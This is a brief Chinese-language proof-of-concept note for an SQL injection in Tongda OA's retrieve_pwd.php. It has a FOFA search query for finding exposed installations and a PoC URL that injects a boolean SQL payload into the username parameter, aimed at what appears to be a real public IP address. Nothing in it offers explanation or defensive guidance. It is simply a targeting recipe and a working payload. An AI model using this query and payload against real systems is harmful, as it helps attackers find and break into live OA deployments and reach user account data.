通达oaretrieve_pwd.phpsql注入漏洞

fofa

app="TDXK-通达OA"

poc

http://60.190.185.74:88/ispirit/retrieve_pwd.php?_GET[username]=admin' and '1'='1